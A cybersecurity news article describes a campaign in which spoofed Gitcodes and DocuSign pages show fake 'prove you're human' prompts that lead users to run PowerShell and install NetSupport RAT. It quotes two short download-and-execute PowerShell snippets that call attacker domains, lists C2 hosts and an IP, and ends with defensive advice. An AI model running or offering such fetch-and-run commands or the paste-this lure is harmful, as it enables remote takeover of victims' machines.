Cyber News

Fake ‘Prove You’re Human’ Prompts Used to Spread NetSupport RAT Malware

Security researchers have recently uncovered a devious malware campaign that employs fake CAPTCHA and “prove you’re human” screens on spoofed websites most notably, imitations of the Gitcodes and DocuSign platforms.

The carefully orchestrated campaign tricks users into executing malicious PowerShell scripts, ultimately installing NetSupport RAT (Remote Access Trojan) on their computers.

This technique capitalizes on users’ familiarity with online verification processes, making it exceptionally dangerous and difficult to detect.

The attack begins when a victim lands on a deceptive webpage, styled to look like a legitimate service such as a Gitcodes “paste tool” website or a DocuSign verification portal.

For example, the domain “gitcodes[.]org” presents itself as a popular code-sharing platform, while “docusign.sa[.]com” mimics the well-known e-signature provider.

Visitors are greeted by seemingly ordinary CAPTCHA prompts or verification requests, instructing them to confirm their humanity by copying a script and running it in the Windows Run prompt.

Technical Execution and Obfuscation Tactics

Once users copy the provided text and execute it via Win+R, a multi-stage PowerShell chain is launched.

The initial script is designed to mimic benign activity, often leveraging simple string concatenation and web requests to retrieve further payloads.

For instance, a typical first-stage script hosted on “gitcodes[.]org” might initiate a web request to a secondary domain, such as “tradingviewtool[.]com,” using a crafted user agent:

powershell$domain = "http://tradingviewtool.com/info2.php"
$ua = "TradingView"
Invoke-WebRequest -Uri $domain -UserAgent $ua -OutFile "C:\temp\next.ps1"
& "C:\temp\next.ps1"

Each subsequent stage typically performs similar actions, downloading and executing additional scripts from new domains, ultimately retrieving the NetSupport RAT payload.

The final stage ensures persistence by modifying the Windows Registry to execute a tampered version of “client32.exe” (disguised as “My Support”) at every logon, making removal difficult.

The DocuSign-spoofed variation adopts similar tactics but adds obfuscation.

The initial script delivered to the clipboard is often encoded using ROT13, a simple substitution cipher, to evade basic signature-based protections.

The user’s click on the fake CAPTCHA triggers an AJAX-based command-and-control (C2) mechanism, which polls a server-side script (“c.php”) every second until it receives confirmation that the user has run the script on their machine.

If the condition is met, the server responds, triggering a refresh and delivering a second-stage PowerShell payload:

powershell# Simplified representative sample for illustration
$url = "https://docusign.sa.com/verification/s.php?an=1"
Invoke-WebRequest -Uri $url -OutFile "$env:TEMP\stage2.ps1"
Start-Process -FilePath "powershell" -ArgumentList "-File $env:TEMP\stage2.ps1"

Multiple script stages are used to fetch additional files, such as “wbdims.exe” or “jp2launcher.exe,” which unpack and launch the NetSupport RAT executable.

Network activity logs and payload analyses indicate that the malware communicates with several servers, including “mhousecreative[.]com” and “170.130.55.203:443,” to complete its mission.

Other campaigns analyzed by security teams show a broadening scope, with identical code patterns appearing on spoofed sites for Okta, media apps, and even leveraging legitimate content-sharing platforms like GitHub and Discord for payload distribution.

Security Recommendations and Key Takeaways

This campaign underlines the escalating sophistication of phishing and malware delivery techniques.

The use of multi-stage downloads, obfuscation, and legitimate-looking prompts are designed to bypass both user caution and automated detection systems. Security experts strongly advise:

  • Exercise extreme caution with any prompt instructing you to copy and run scripts or commands.
    Legitimate websites and services almost never require users to execute PowerShell or command-line scripts.
  • Scrutinize website URLs and SSL certificates.
    Spoofed sites often use lookalike domains and self-signed certificates.
  • Educate users about the risks of self-executing scripts.
    Awareness is a critical defense against such socially engineered attacks.

The NetSupport RAT, while a legitimate remote administration tool, is increasingly abused by threat actors for cyber espionage, data theft, and lateral movement within networks.

This “self-infect” method is reminiscent of both opportunistic and advanced persistent threat (APT) activity, and has been previously associated with groups such as FIN7, Scalert Goldfinch, and STORM-0408.

Security teams must remain vigilant, as attackers continually refine their techniques.

The recent campaign demonstrates that even seemingly simple “prove you’re human” checks can be deadly when combined with crafty scripting and user trust.

Priya

Recent Posts

Burp Suite Supercharges Its Scanning Capabilities With React2Shell Vulnerability Detection

PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…

4 months ago

Malicious MCP Servers Enable New Prompt Injection Attack To Drain Resources

Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…

4 months ago

Law Enforcement Detains Hackers Equipped With Specialized Flipper Hacking Tools

Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…

4 months ago

Google Unveils 10 New Gemini-Powered AI Features For Chrome

Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…

4 months ago

CISA Alerts On Actively Exploited Buffer Overflow Flaw In D-Link Routers

Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…

4 months ago

Over 500 Apache Tika Toolkit Instances Exposed To Critical XXE Vulnerability

Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…

4 months ago